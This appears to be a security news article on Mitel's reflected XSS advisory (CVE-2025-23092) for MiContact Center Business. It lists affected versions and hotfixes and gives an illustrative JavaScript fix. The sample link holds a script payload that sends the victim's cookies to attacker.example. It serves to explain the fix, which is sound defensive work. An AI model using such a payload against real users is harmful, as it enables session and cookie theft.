
Mitel has issued a security advisory regarding a reflected cross-site scripting (XSS) vulnerability, tracked as CVE-2025-23092 (CVSS 7.1), in the Legacy Chat component of its MiContact Center Business software.
The advisory states that successful exploitation could allow an unauthenticated attacker to execute arbitrary script in the browser of a user who opens a crafted link, which could disclose sensitive information from, and modify, that user's current chat session.
While the vulnerability is rated as high severity, Mitel notes that the impact on confidentiality and integrity is limited.
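To make the class of bug concrete, the following is an added, illustrative example of a reflected XSS pattern and its standard fix (output encoding at the point the untrusted value is written into markup). It is constructed for this page and is not Mitel's Legacy Chat code; the `visitorName` parameter, the `/chat` path and the page template are assumptions, and the sample URL is a constructed input.

```javascript
// Constructed example of reflected XSS and its fix. This is NOT Mitel's code;
// the parameter name "visitorName", the "/chat" path and the markup are assumed.

// HTML-encode the characters that can break out of text or attribute context.
// Encoding untrusted input where it is written into markup is the standard
// fix for reflected XSS.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the query-string value is reflected verbatim into the page, so a
// crafted link executes attacker-supplied script in the victim's browser session.
function renderChatPageVulnerable(visitorName) {
  return `<div class="chat-header">Chatting with ${visitorName}</div>`;
}

// Fixed: the same page with the reflected value HTML-encoded.
function renderChatPageFixed(visitorName) {
  return `<div class="chat-header">Chatting with ${escapeHtml(visitorName)}</div>`;
}

// Extract the reflected parameter from a request URL the way a handler would.
function visitorNameFromUrl(url) {
  return new URL(url, "http://localhost").searchParams.get("visitorName") ?? "";
}

// Constructed sample request: a link an attacker could send to a chat user.
// Decoded, visitorName is:
//   <script>document.location='https://attacker.example/?'+document.cookie</script>
const SAMPLE_URL =
  "/chat?visitorName=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E";

// Render the sample request through both versions of the handler.
function demo() {
  const name = visitorNameFromUrl(SAMPLE_URL);
  return {
    vulnerable: renderChatPageVulnerable(name),
    fixed: renderChatPageFixed(name),
  };
}

const result = demo();
console.log("vulnerable:", result.vulnerable);
console.log("fixed:     ", result.fixed);
```

The vulnerable rendering contains a live `<script>` element; the fixed rendering carries the same bytes as inert text (`&lt;script&gt;...`). A template engine that auto-escapes, or a framework that never concatenates request data into HTML, achieves the same result without a hand-written encoder.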
The following versions of MiContact Center Business are affected:
- 10.2.0.0 through 10.2.0.4
- 10.1.0.0 through 10.1.0.5
- 10.0.0.0 through 10.0.0.4
- 9.5.0.3 and earlier
Mitel strongly recommends that customers running an affected version apply the fix for their release:
- 10.2.0.0 through 10.2.0.4: upgrade to MiContact Center Business 10.2.0.5 or later.
- 10.1.0.5, 10.0.0.4 and 9.5.0.3: apply hotfix KB571322, KB571372 or KB571320, respectively.
- 9.5.0.3 or earlier: either upgrade to a supported release and apply its hotfix, or upgrade to a later release.